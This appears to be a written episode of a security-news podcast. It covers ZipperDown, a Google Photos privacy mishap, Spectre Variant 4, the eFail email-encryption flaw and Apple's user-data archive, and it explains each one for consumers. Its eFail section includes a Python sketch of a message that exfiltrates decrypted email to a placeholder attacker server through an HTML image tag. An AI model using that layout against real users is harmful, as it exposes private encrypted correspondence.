Checklist 93: What’s New in Security News
Welcome to Episode 93 of The Checklist. Today, our attention turns towards security and insecurity — but we’re not talking about a long-lost Jane Austen novel. Instead, we’re taking a tour through the headlines to hit some of the big and interesting stories that have cropped up in the security sector over the past few weeks. Things we’ll be visiting on today’s list include:
- The ZipperDown vulnerability
- Puppy Pictures Preempt Privacy
- The returning specter of Spectre
- eFail: a big bug in email encryption
- What does Apple know about you?
The answer to that last question may surprise you, especially since it is, in fact, a positive story. First, though, we’ll need to wade through some of the bad bits before we can get to the good stuff. Let’s start with the news that perhaps as many as 10% of all the apps available in the App Store could be vulnerable to a newly-discovered exploit.
The ZipperDown vulnerability
News has recently begun to trickle out about a new iOS vulnerability that researchers estimate affects nearly 16,000 apps in the App Store. Details about how the vulnerability actually works are hard to come by so far, but we do know the conditions necessary for the attack to succeed. Researchers at Pangu Lab announced the vulnerability, named ZipperDown, in the middle of May. They describe it as a “common program error,” meaning it’s a problem with the way individual apps are written, rather than an actual bug in iOS itself.
The good news is that ZipperDown only works under a highly specific set of circumstances, which the average person isn’t likely to encounter. First, the bad guys must be in control of the Wi-Fi network to which you’ve connected your device — not usually an easy task. Second, an affected app has to run outside the protections built into iOS, known as the sandbox. If you’d like to brush up on what the sandbox is, check out Checklist 74, where we covered the general security features of iOS. The only way for an app to run outside the sandbox these days is if you jailbreak your phone.
Only when both conditions are met can attackers exploit the vulnerability. A successful attack allows them to execute arbitrary code, potentially gaining deeper access to your device and its data. The average person will probably never encounter this, which is a good thing considering how many apps ZipperDown affects. For now, app developers can’t do much to correct the problem until they’re told the specifics of the exploit, so more information is likely still to come.
With that said, here’s something that bears repeating, again and again: don’t jailbreak your iOS devices. Not only do you open yourself up to a world of vulnerabilities like ZipperDown, you don’t gain much in the process. Instead, take advantage of the built-in security features of iOS so you can keep using your devices without worrying.
Puppy Pictures Preempt Privacy
Way back in Episode 67, another of the shows we did covering iOS security, we spent some time chatting about how Apple limited third-party apps’ access to the photo library on your iOS device. It was a very good thing, giving users improved privacy over their personal photos. A recent story that made the rounds in the tech and security sectors has inspired us to spend some time discussing why this step was such a good move, and what goes wrong when apps have unrestricted access to our photos.
Jason Koebler, a reporter for tech publication Motherboard, recently fessed up to making a rather embarrassing mistake: he traded his privacy for a video of a puppy. Who can blame him when a cute video of a dog was on the line? Here’s the story: years ago, Koebler downloaded the Google Photos app but declined to give it access to his photo library. Had he granted permission, Google Photos would have automatically begun uploading every picture there to Google’s servers, where Google categorizes images by running them through facial and image recognition algorithms. That’s exactly why he chose to deny permission.
The unused app hung around on his phone for years, forgotten, until Koebler went to a concert and, as one does, had a few drinks while waiting for the show to start. Recalling that a friend had recently adopted a new dog, he fired off a text asking for a photo. His friend replied with a cute video — uploaded to and shared from Google Photos. Naturally, Koebler clicked the link, which automatically opened the app.
Here’s the rub: you can’t use Google Photos, even if you only want to view someone else’s upload, without granting it access to your own pictures. In the moment, Koebler chose to grant access, figuring in his inebriated state that he’d simply switch it back off later. Satisfied with the puppy video and with the concert beginning, he put the phone back in his pocket. And, as one does in these situations, he forgot all about that single tap granting permission — until the next morning.
(An important side note: if you don’t have Google Photos installed on your iOS device and you choose to click a link sent to you from a friend, don’t worry. You can still view the photo or video in your device’s web browser without worrying about handing over your entire photo library.)
When Koebler awoke the next morning, a cheerful alert on his phone informed him that Google Photos had successfully uploaded all 15,000 images and videos from his photo library. Not wanting all that private information sitting in Google’s cloud, he quickly set about deleting them all — only to find it was going to be a tedious task indeed. Google only allows you to delete 500 photos at a time, and even then, they aren’t truly gone right away: trashed items linger for 60 days before permanent deletion! Although, like most trash folders, you can empty the trash immediately (if you remember to do so).
Luckily, there were no real consequences from this incident, but it neatly illustrates a simple fact: it only takes one mistake to imperil your privacy. That’s why good habits and smart thinking about security should become second nature. No puppy video is worth giving Google a chance to train its algorithms on all 15,000 of your personal photos — just wait for an opportunity to open that link somewhere else. Of course, this lesson applies to far more than Google Photos. We’re always talking about vigilance on this show, and this is one of those times when it could’ve come in handy!
The returning specter of Spectre
Remember Spectre, the hardware-level CPU vulnerability that caused consternation and panic when it was announced? If you want a quick refresher, the site meltdownattack.com sums it up nicely:
Spectre breaks the isolation between different applications. It allows an attacker to trick error-free programs, which follow best practices, into leaking their secrets. In fact, the safety checks of [those] best practices actually increase the attack surface and may make applications more susceptible to Spectre.
That synopsis is a highly simplified explanation of Spectre, but if it sounds scary, that’s because it is. For those who want to revisit the topic, or who are just hearing about it for the first time, head back to Episode 73 of the Checklist, where we took a deep dive into the subject. Twenty weeks after that episode, Spectre is back in the news with a vengeance.
Since the announcement of Spectre, Intel has been hard at work both addressing Spectre itself and managing the PR hurricane the stories generated. “Security flaws affect almost all computers” is not the kind of headline you want associated with your company, after all. As part of these efforts, Intel announced back in February that it would expand its bug bounty program with specific rewards for uncovering Spectre-style vulnerabilities that break the CPU’s secure running environment. Paying hackers to find problems is usually a good way to get results — and it seems to have turned up a new problem now.
Dubbed Spectre Variant 4, it follows the overall framework of a typical Spectre attack, leveraging the speculative execution features of modern chips to leak user data through a digital side door. For more on speculative execution, be sure to revisit Episode 73. So, what makes Variant 4 so notable if it’s the same style of bug? This one can work in a “language-based runtime environment” — in other words, the kinds of things that power core features of the Web, such as JavaScript. That could mean critically sensitive data we send over the Internet would be vulnerable to tampering and interception in some situations. There are a few wrinkles to discuss, though.
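Since the speculation happens silently inside the processor, no snippet of code can truly reproduce it, but a toy sketch can at least show the shape of the code pattern at issue. The sketch below is purely illustrative (the names, values, and dictionary are our own invention), and the comments describe what an affected CPU may do behind the scenes with a store-then-load sequence like this one:

```python
# Toy model of the Spectre Variant 4 ("speculative store bypass")
# pattern. Python can't trigger real CPU speculation; the comments
# describe what an affected processor may do with code shaped like this.

memory = {"slot": "SECRET"}  # the slot briefly holds sensitive data

def victim_sequence():
    # (1) A store that overwrites the secret with harmless data.
    #     On an affected CPU, this store can be slow to resolve.
    memory["slot"] = "public"

    # (2) A load from the same location. The processor may run this
    #     load speculatively, BEFORE step (1) completes, and briefly
    #     see the stale value "SECRET".
    value = memory["slot"]

    # (3) The speculative result is eventually discarded, so the
    #     program always sees "public". In a real attack, though, the
    #     stale value feeds a dependent memory access whose cache
    #     footprint an attacker can recover via a timing side channel.
    return value

print(victim_sequence())  # always prints "public" when run as Python
```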
The good news: Intel so far has no evidence of successful exploits taking place in any web browser. Meanwhile, the patches it produced to mitigate earlier versions of the Spectre flaw should also be effective against Variant 4, rendering it harmless on updated machines. However, the news isn’t all good: many of the upcoming patches and BIOS updates that address Spectre will ship disabled by default, since they can cause a CPU performance hit of up to 8% — enough for most people to notice.
There’s more bad news, too: in the end, all these fixes are only stopgaps. Recall that Spectre is not a software bug but a flaw baked into the silicon itself, deep in the chip’s design. That means permanent fixes don’t exist, and existing chips will always be potentially vulnerable without the patches. We won’t be able to put Spectre to bed for good until the next generation of hardware comes out of Intel’s factories.
Even then, the vulnerable chips won’t simply disappear — they’ll remain at risk for the remainder of their usable lives. It will take time before those machines are phased out through obsolescence or upgrades, so this may not be the last time we talk about Spectre. If Intel’s bug bounty program turns up something else, we’ll be sure to revisit the topic.
eFail: the worst dating site, ever
Now let’s turn our attention to email — one of the most basic and revolutionary parts of the Internet, now so commonplace that many of us don’t give it a second thought. Here on the Checklist, we haven’t yet gone into an in-depth discussion of encryption options for email. Perhaps soon we’ll do an episode covering everything you need to know to lock down your messages, but today we’re discussing a big problem currently affecting email encryption. This story shows that serious flaws can turn up even in systems designed from the start to be secure; even the best-built privacy applications can sometimes fail.
Pretty Good Privacy, usually known simply as PGP, has been considered one of the gold standards for email encryption since the mid-1990s. While not everyone relies on PGP and its related family of encryption protocols, it enjoys widespread popularity in the security sector, among journalists, and elsewhere. Recently, a group of researchers from Germany and Belgium announced findings indicating a serious issue affecting the PGP and S/MIME encryption schemes for email.
Called eFail, the flaw allows an attacker to intercept your encrypted email and alter it, changing how HTML elements in the message will be processed. These common elements could include anything from an embedded picture of a puppy to an embedded YouTube video. Once the attacker makes the alteration, the email proceeds on to its intended destination. The receiving user’s email client decrypts the secured message and, unknown to the user, loads the altered HTML elements from a server the attacker controls. In the process, the plain-text version of the email becomes available to the hacker.
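To make that concrete, here is a rough Python sketch of the message layout used in one published form of the attack, often called direct exfiltration. The attacker address and ciphertext below are placeholders, and the MIME structure is simplified; the point is the three-part sandwich that tricks a vulnerable client into pasting decrypted text into an image URL.

```python
# Simplified sketch of an eFail-style "direct exfiltration" message.
# The addresses and ciphertext below are placeholders for illustration.
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
from email.mime.text import MIMEText

msg = MIMEMultipart("mixed")
msg["To"] = "victim@example.com"
msg["Subject"] = "eFail layout (illustration only)"

# Part 1: opens an <img> tag and leaves its src attribute unterminated.
msg.attach(MIMEText('<img src="https://attacker.example/', "html"))

# Part 2: the intercepted ciphertext, replayed unchanged. (A real
# message would use the full PGP/MIME or S/MIME structure.)
msg.attach(MIMEApplication(b"-----BEGIN PGP MESSAGE----- ...",
                           "pgp-encrypted"))

# Part 3: closes the attribute and the tag. A vulnerable client
# decrypts part 2 in place and renders all three parts as one HTML
# document, so the plaintext lands inside the image URL and is sent
# to the attacker's server when the client fetches the "image".
msg.attach(MIMEText('">', "html"))

print(msg.as_string())
```

Disabling HTML rendering, as suggested below, breaks exactly this last step: the client never fetches the “image,” so nothing leaks.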
This is another case the average Joe probably won’t encounter, as the hacker needs extensive digital access to both targets to be able to intercept the messages in transit in the first place. That said, most people who take the time to learn PGP and put in the effort to use it in their daily communications aren’t doing so for fun. These are people with information they need to protect and keep secret, such as the aforementioned journalists. For an attacker, targets like that make the extra effort worthwhile, and as we’ve seen in several stories, state-sponsored hacking is a real thing. With the budget and determination of a security agency behind an attacker, eFail could have real-world consequences.
The situation around eFail is evolving. For now, the best suggestion for mitigating the potential damage is to apply patches as they become available. Most likely, these patches will come for the encrypted email plugins used to send and receive PGP messages easily. Disabling HTML rendering and formatting in your email client will also cut off the route the hacker relies on to get at the plain-text email. In other words, users who encrypt their mail should stick to plain text: don’t get fancy with complex formatting and pictures, especially ones that load from an external server. Shut the digital door and lock it!
What does Apple know about you?
Okay — enough about Spectres and eFails and jailbreaks. What about the good news we mentioned earlier? It’s time to talk about what Apple knows about you — and here’s the surprise: Apple doesn’t actually know as much about you as you might think. Recently, in Episode 85 of The Checklist, we examined the type of data Facebook collects on every user and how you can check your records to find out what Facebook knows. Now we’re curious about how Apple compares — is its public commitment to user privacy for real, or just a facade for good PR?
Near the start of May, Zack Whittaker, security editor for the online publication ZDNet, contacted Apple to ask for all the data it had stored on him, going all the way back to his first iPhone purchase in 2010. Now, this was no small task. Some companies, like Google, Twitter, and Facebook, have built tools that automate the process of gathering the data and creating an archive of all the information in question; on those sites, it usually takes an hour or less from submitting the request. These archives aren’t small, either, which is why the results aren’t instant: what you get back could range from a couple of hundred megabytes to a few gigabytes of data, depending on how much the service has collected about you.
Apple, though, doesn’t seem to have such a process in place, given that Whittaker had to contact the Cupertino company directly. A week later, it had his archive ready and sent it back to him. So how big was the archive? 500 MB? 2 GB? 10? No: it actually clocked in at a mere 5 megabytes, no larger than a high-quality photo shot on the latest iPhone. The archive contained several dozen spreadsheets, most of which held simple metadata: information such as whom he sent text messages to and when he initiated FaceTime calls, along with dates and times.
Apple has no record of things you do with Siri, Maps, or News, because it gathers all that data anonymously — it has no way of knowing to whom a particular piece of data belongs. That’s why the archive didn’t include any highly personalized information, and that’s a good thing. Whittaker did turn up several other interesting items, though none are big privacy bombshells. Consider this list of other things Apple collects on its users:
- Basic account information (Apple ID, home address, phone number, and your name)
- Timestamped logs created each time your device downloads from iCloud (but not the downloaded files themselves)
- Logs indicating whenever your devices interact with your personal iCloud email account
- Device history (for all purchased devices, including their serial numbers, carrier lock status, and other unique identifiers such as Bluetooth and Wi-Fi connections)
- Any records of your AppleCare interactions, such as repair request data
- Warranty data, including your AppleCare status
- Logs for all log-in events to iTunes, plus the device you used
- Data related to any interactions you’ve had with the Game Center
- Logs indicating visits to your Apple ID through a web browser
- Logs of password reset requests
- Logs for iTunes Match uploads and downloads
- A total record of your download history, including songs, apps, and more, plus data on the downloading device
As you can see, that’s a lot of info — but none of it is particularly concerning for the average user. Apple does plan to roll out a similar data-request tool later this year, bringing it up to speed with other businesses in this area. That means we’ll all soon be able to see just what Apple knows about us. It’s a big win for privacy and transparency, and it could prove to be an important tool for holding Apple accountable.